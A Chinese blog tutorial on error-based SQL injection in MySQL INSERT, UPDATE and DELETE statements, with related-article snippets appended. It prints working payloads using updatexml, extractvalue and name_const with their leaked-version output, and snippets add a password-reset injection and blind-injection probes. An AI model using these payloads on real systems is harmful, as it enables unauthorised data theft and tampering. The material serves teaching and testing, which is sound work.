insert、update和delete 注入方法

最新推荐文章于 2025-06-10 11:09:41 发布
最新推荐文章于 2025-06-10 11:09:41 发布
阅读量5k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: web安全 文章标签: sql注入 insert注入 delete注入 update注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq1124794084/article/details/84590929
本文深入探讨了SQL注入的多种技巧,不仅限于查询注入,还包括通过insert、update和delete语句进行的注入。文章详细解释了如何利用updatexml、extractvalue和name_const函数进行数据库版本和敏感信息的获取,提供了具体的注入示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。

所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete的注入方法。

以下均为报错注入,测试数据库版本5.7.21

利用内置函数updatexml、extractvalue或name_const

测试表如下:

一、使用updatexml()函数


UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据 
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
而我们的注入语句为:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

payload:

or updatexml(1,concat(0x7e,(version())),0) or

 

测试 insert注入:

mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试update注入

mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试delete注入

mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

二、extractvalue()函数

extractvalue() :对XML文档进行查询的函数
其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样
语法:extractvalue(目标xml文档,xml路径)
第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

payload:

or extractvalue(1,concat(0x7e,database())) or

测试insert注入

mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试update注入:

mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试delete注入

mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

三、name_const()函数

name_const(name,value)
返回给定值。 当用来产生一个结果集合列时, name_const()促使该列使用给定名称。

payload

or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

测试insert注入

mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'

测试update注入

mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

测试delete注入

mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

参考链接:https://www.cnblogs.com/r00tgrok/p/3854754.html

实战测试:

HongCMS后台在清除表格的时候存在sql注入,即delete注入

详情连接:https://www.freebuf.com/vuls/178316.html

使用updatexml payload

使用extractvalue

使用name_const

SQL语句之INSERT/UPDATE/DELETE 语句
m0_73776435的博客
03-21 3887
eg、假设现有 TAB1 表 (如上),并按 C1 列分组求 C2 列的平均值,并存入 TAB2 表(其中 TAB2 表的 C1 列存放C1,avg_C2 列存放 C2 列的均值)situation3.明确给出新增元组要在哪些属性列上赋值(插入数据不包含全部属性列)INSERT。situation1.明确给出新增元组要在哪些属性上赋值(插入数据包含全部属性列)INSERT.注意:DELETE 语句删除的是表中的数据,并不是表的定义,表的定义仍在数据字典当中。situation1.删除某一个元组的值。
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2708
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
pikachu靶场通关笔记23 SQL注入06-delete注入(报错法)
最新发布
mooyuan的网络安全博客
06-10 1142
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对delete注入关卡源码的代码审计找到安全风险的真实原因,讲解delete注入的原理并进行渗透实践,本文为SQL注入06之delete注入关卡的渗透部分。
insert/update注入
Ethan024的博客
03-30 1139
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
【MySQL】2 insert updatedelete操作
scorpio_j的博客
01-06 322
1、Insert -- 公式 -- 一行 insert into js_user(字段1,字段2,字段3,...) VALUES(值1,值2,值3,...) -- 多行 insert into js_user(字段1,字段2,字段3,...) VALUES(值1,值2,值3,...),(值1,值2,值3,...)。。 -- 注意点 -- 自增 可以不用写 auto_increment -- 可同时插入多行数据 使用逗号隔开 insert into grade(`gradename`) VALUES('研
MySQL数据的插入、修改、删除(INSERT /Update/DELETE
StringKing的博客
11-30 3398
一、数据的插入(Insert/Create) CREATE TABLE students ( id INT PRIMARY KEY NOT NULL AUTO_INCREMENT, sn INT NOT NULL UNIQUE COMMENT '学号', name VARCHAR(45) NOT NULL, email VARCHAR(200) NULL ); -- INSERT 操作的基本格式 -- 表名称: -- 全名称: `库名`.`表名` -- 库名表名没有...
基于insert update delete注入
qq_43814486的博客
04-04 964
inset注入原理: 所谓inset注入就是指我们前端注册的信息会被后台通过insert操作插入到数据库里边去,若此时后台没有做出相应的处理就会构成insert注入。 ...
MySQL开发(九):基础查询操作:SELECT、INSERTUPDATEDELETE
一名热衷于技术的全栈开发者,专注于前端与后端的全面技术探索。在这里,我将分享我在技术领域的学习与成长,助力更多开发者的进步。
10-27 1197
MySQL 的基础查询操作是每个开发者必备的技能。通过掌握SELECTINSERTUPDATEDELETE的用法,可以有效地管理数据库中的数据。本文提供了详细的示例表格,希望对您的 MySQL 学习之旅有所帮助。
Oracle 数据操作基础:INSERT/UPDATE/DELETE最佳实践
记录学习的过程
05-29 1350
本文详细介绍了Oracle数据库中的DML(数据操作语言)命令,包括INSERTUPDATEDELETEMERGE四大核心操作。首先概述了DML的特点,如需要显式提交、可回滚、产生重做日志等特性。然后分章节深入讲解了每个命令的语法使用方法INSERT部分涵盖基本语法、多行插入技术高级功能;UPDATE部分说明基础更新、子查询更新批量更新;DELETE部分介绍基础删除高级技巧;最后重点解析了MERGE命令的"upsert"功能,展示如何实现数据同步操作。文章通过丰富的代码示
实验13:insert update delete注入
qq_44720671的博客
04-01 770
基于insert update delete注入利用 一、insert/update注入 打开Pikachu中的insert/update注入 点击注册界面 首先测试注入点,通常我们用”单引号“来测试,在必选项上分别输入”单引号“ 因此,我们可以利用报错获取信息 用户名输入nihao’ or updatexml(1,concat(0x7e,database()),0) or ’ 密码随意输入,...
yii框架builder、updatedelete使用方法
10-26
本篇将详细介绍Yii框架中的`builder`、`update``delete`方法的使用。 1. Query Builder: Query Builder允许开发者通过面向对象的方式来构建SQL查询,无需直接编写原始的SQL语句。它通过一系列的方法调用来创建...
【MySQL | 基础】 INSERTUPDATE DELETE 语句
翼同学
03-31 1879
DML语句是对数据库中表的数据进行增删改操作。本章讲到了DML语句的插入数据,修改数据,删除数据。
SQL注入Update注入
weixin_43765321的博客
03-03 6834
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
MySQL之DDL语句表数据的insertdeleteupdate、select
折戟沉沙
09-02 6225
1、DDL语句 DDL语句(DataBase Defined Language 数据定义语句) 1.1数据库的定义 (1)数据库的创建 CREATE CREATE DATABASE db_name;创建一个默认的数据库,如果存在报错,不存在则创建。 CREATE DATABASE IF NOT EXISTS db_name;创建一个默认的数据库,[IF NOT E...
SQL注入——update注入(pikachu)
W小哥
01-15 3397
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
针对UPDATE语句的SQL注入
qq_69100706的博客
07-30 502
在CTF(Capture The Flag)竞赛中,针对UPDATE语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,当应用程序使用用户提供的数据来更新数据库中的记录时尤为常见。如果应用程序没有正确地清理或参数化这些用户输入,攻击者就可以注入恶意SQL代码,以操纵数据库更新操作。
SQL注入实战:Update注入
ting_liang的博客
01-21 1480
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysqlUpdate语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
insert 注入逻辑
weixin_46601374的博客
04-01 308
现在的孩子,分手专挑情人节,告白专挑愚人 MYSQL注入什么是DML?INSERT语句基本使用INSERT语句报错逻辑INSERT留后门逻辑 情人节表白,人家不听。愚人节表白,人家不信。清明节表白,人家不应。 什么是DML? DML:数据操作语言 功能:主要是对表,视图等对象进行查询,插入,更新删除操作 包括: select查询 insert插入 update更新 delete删除 INSERT语句基本使用 INSERT INTO users(uid,uname,password,isadmin)
update注入的一个小trick
vspiders的博客
06-18 383
0x01 Mysql特性Mysqlupdate语句的定义如下:UPDATE table_name SET field1 = new-value1, field2 = new-value2 [WHERE Clause]但是偶然发现,field1与field2两字段可以同名,并且UPDATE之后的字段内容会以field2的赋值为准。如上图中,Link字段被赋值了两次,最终的该Link字段的内容以最后...
pikachu中完成SQL-Inject模块进行SQL insert注入update注入delete注入以及http头注入实验
12-27
### SQL 注入实验教程 #### Insert 注入 在 Pikachu 平台上执行 `INSERT` 类型的 SQL 注入,主要通过构造特定的有效载荷来触发数据库错误并泄露信息。有效载荷通常会利用某些函数(如 `updatexml()`),这些函数会在遇到异常情况时抛出可捕获的信息。 对于 `INSERT` 操作而言,可以构建如下形式的有效载荷: ```sql name' OR updatexml(1, concat(0x7e, database()), 0) OR ' ``` 此语句尝试向表中插入一条新记录的同时调用了 `updatexml()` 函数以期引发 XML 解析器错误从而暴露当前使用的数据库名称[^2]。 #### Update 注入 针对更新操作 (`UPDATE`) 的注入攻击同样依赖于制造条件使目标应用程序返回非预期的结果集或状态码变化。一种常见的做法是在设置字段值的地方嵌入恶意逻辑表达式,进而影响后续的数据处理流程。 假设有一个允许修改用户资料的功能接口,则可以通过提交特制参数来进行测试: ```sql username=admin'; UPDATE users SET password=md5('new_password') WHERE id = '1 -- ``` 这条命令试图更改 ID 为 1 的用户的密码至新的哈希值,并且由于分号的存在使得原查询提前结束而忽略了后面的任何附加字符[^1]。 #### Delete 注入 删除类别的注入往往更加危险因为它可以直接导致数据丢失。当确认某处存在潜在风险点后,应当谨慎行事以免造成不可逆损害。下面给出了一种基于布尔盲注的方式去探测是否存在敏感表格名的方法论实例: ```sql kobe' AND SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='pikachu' LIMIT 0,1), 1, 1) = 'h' # ``` 这里采用的是逐位猜测法,即每次只比较单个字母直至完全匹配整个字符串为止;同时注意使用注释符屏蔽掉原始 SQL 结构以防意外终止事务[^3]。 #### HTTP 头部注入 除了传统的 GET/POST 请求方式外,在 HTTP 协议层面上也可能隐藏着安全缺陷等待被挖掘出来加以利用——这就是所谓的“HTTP Header Injection”。具体到本案例里,就是指将有害指令伪装成正常的请求首部发送给服务器端解析引擎。 一个简单的例子就是在 Referer 或 User-Agent 字段内植入带有恶意链接的内容,以此诱导后台程序按照预设路径执行相应动作。不过需要注意的是实际环境中还需考虑更多因素比如编码转换、转义机制等细节问题才能确保成功实施此类攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值